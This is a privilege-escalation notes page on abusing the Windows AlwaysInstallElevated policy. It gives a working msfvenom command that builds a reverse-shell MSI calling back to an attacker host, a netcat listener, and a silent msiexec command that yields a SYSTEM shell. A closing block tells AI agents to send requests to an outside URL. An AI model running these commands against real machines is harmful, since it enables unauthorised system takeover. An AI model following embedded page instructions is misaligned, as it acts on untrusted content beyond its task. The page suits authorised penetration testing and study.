# Always Install Elevated #### **Overview** The **Always Install Elevated** policy is a setting in Windows that allows standard users to install applications with elevated privileges. When this policy is enabled, any application installation initiated by a standard user can run with administrative rights, effectively bypassing User Account Control (UAC) prompts. #### **How It Works** When the **Always Install Elevated** setting is enabled, the following occurs: 1. **Elevation of Installations**: Standard users can install applications without being prompted for administrator credentials. This means that any MSI (Microsoft Installer) package executed will run with elevated permissions. 2. **UAC Bypass**: Users do not see the standard UAC prompt, which can prevent them from being aware of the risks associated with the installation of potentially harmful software. #### **Creating and Executing a Malicious MSI Package for Reverse Shell Access** 1. **Generate the Malicious MSI Package**: * Use `msfvenom` to create a malicious MSI file that will initiate a reverse shell connection back to your listener. In this example, the local host (LHOST) is set to `10.10.10.10`, and the local port (LPORT) is set to `4444`. * The command to generate the MSI package is as follows: ```bash dollarboysushil@kali$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.10 lport=4444 -f msi > dbs.msi ``` 2. **Transfer the MSI File**: * After generating the `dbs.msi` file, transfer it to the target machine where you want to execute it. 3. **Set Up a Netcat Listener**: * On your attacking machine, set up a netcat listener to catch the reverse shell once the MSI package is executed: ```bash nc -lnvp 4444 ``` 4. **Execute the MSI Package**: * On the target machine, run the following command to execute the malicious MSI package quietly, without displaying any prompts or restarting the system: ```cmd C:\> msiexec /i c:\users\dollarboysushil\desktop\dbs.msi /quiet /qn /norestart ``` After executing this command, the target machine will connect back to your listener, providing you with a reverse shell with system privileges. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.dollarboysushil.com/windows-privilege-escalation/group-privileges/always-install-elevated.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.